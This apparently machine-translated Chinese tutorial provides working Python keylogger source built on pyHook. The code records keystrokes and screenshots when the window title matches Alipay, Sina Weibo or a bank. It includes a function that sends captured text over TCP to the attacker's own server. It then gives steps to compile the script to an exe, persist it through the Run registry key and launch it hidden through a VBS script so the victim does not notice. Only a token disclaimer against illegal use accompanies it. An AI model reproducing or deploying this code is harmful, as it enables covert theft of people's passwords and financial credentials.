Of Stack

Python USES pyHook to monitor user mouse and keyboard events

  • 2020-04-02 13:57:56
  • OfStack

This article with a simple monitoring of mouse, keyboard events procedures, to achieve the user's input (such as login some website accounts, passwords) function. Through the test, for a "streaking" computer, can fully access to the user input any information; But if you have anti-virus software installed, that's enough. The specific implementation method is as follows:

One, the code part : get the input information of the user and save it to XX directory together with the screenshot 


# -*- coding: utf-8 -*- # 

import pythoncom 
import pyHook  
import time
import socket
from PIL import ImageGrab

#
# If you are remotely listening to a target computer, you can set up your own server and send the information back to the server 
#
def send_msg_to_server(msg):
  host=""
  port=1234
  buf_size=1024
  addr=(host,port)
  if len(msg)>0:
    tcp_client_sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    tcp_client_sock.connect(addr)
    info=time.strftime('%Y%m%d%H%M%S',time.localtime(time.time()))+' from '+socket.gethostname()+':'
    tcp_client_sock.sendall(info+msg)
    tcp_client_sock.close()
    
#
# You can also save the information to a local file 
#
def write_msg_to_txt(msg):  
  f=open('D:/workspace/mytest/pyhook/media/monitor.txt','a')
  f.write(msg+'rn')
  f.close()

def onMouseEvent(event): 
  #  Monitor mouse events    
  global MSG
  if len(MSG)!=0:    
    #send_msg_to_server(MSG)
    write_msg_to_txt(MSG)
    MSG=''
    pic_name = time.strftime('%Y%m%d%H%M%S',time.localtime(time.time()))
    # Save the screenshot of the user to a local directory (or send it to your own server remotely) 
    pic = ImageGrab.grab()
    pic.save('D:/workspace/mytest/pyhook/media/mouse_%s.png' % pic_name)
  return True
 
def onKeyboardEvent(event):
  # Monitor keyboard events 
  global MSG
  title= event.WindowName.decode('GBK')
  # Through the website title To determine whether the current website is a "listening target" 
  if title.find(u" Pay treasure ") != -1 or title.find(u' Sina weibo ')!=-1 or title.find(u' Shanghai pudong development bank ')!=-1:
    #Ascii: 8-Backspace , 9-Tab ,13-Enter 
    if (127 >= event.Ascii > 31) or (event.Ascii == 8):
      MSG += chr(event.Ascii)        
    if (event.Ascii == 9) or (event.Ascii == 13):      
      #send_msg_to_remote(MSG)
      write_msg_to_txt(MSG)
      MSG = '' 
      # Screen capture realization 
      pic_name = time.strftime('%Y%m%d%H%M%S',time.localtime(time.time()))
      pic = ImageGrab.grab()
      # Save a picture named after the date 
      pic.save('D:/workspace/mytest/pyhook/media/keyboard_%s.png' % pic_name)
  return True 
 
if __name__ == "__main__":   
  MSG = ''  
  # create hook handle 
  hm = pyHook.HookManager()

  # Monitoring the mouse 
  hm.SubscribeMouseLeftDown(onMouseEvent)
  hm.HookMouse()

  # Monitoring the keyboard 
  hm.KeyDown = onKeyboardEvent
  hm.HookKeyboard()

  # Loop fetch message 
  pythoncom.PumpMessages()

2. Package the script with py2exe:

Create a new py file setup.py, and the contents are as follows: 


from distutils.core import setup
import py2exe
setup(console=["monitor.py"])
#setup(windows=["monitor.py"])

The command line executes the following command: 


pythonsetup.pypy2exe

Iii. Set the program to start automatically:

Step 1:

Put the files you want to boot (create a shortcut, then) into the start/all programs/start directory

Step 2:

Modify the registry: command line - regedit, then go to the following path:
[HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Run]    

Create a new "string value" and edit: sets the path to the exe file
D: \ workspace \ mytest \ pyhook \ dist \ monitor exe

(if you start monitor.exe in either of the above ways, a command box will pop up showing the monitor log information. This way, the listener will be able to find it at once. Try the following method.)

Step 3:

Create a new.vbs file as follows: 


setwscriptObj=CreateObject("Wscript.Shell")
wscriptObj.run " D:workspacemytestpyhookdistmonitor.exe",0

Double-click to run the VBS file, and monitor. Exe starts in the background (without a large black box popping up).
Then the reference, set the VBS to boot.

Supplement:

1, the program involves some modules need to install their own;
2. In the article, "D: workspace..." Such a path needs to be changed to its own real path;
3, this code is only a test example, readers do not use it for illegal purposes.

Interested readers can improve on this example to make it more functional.

Related articles: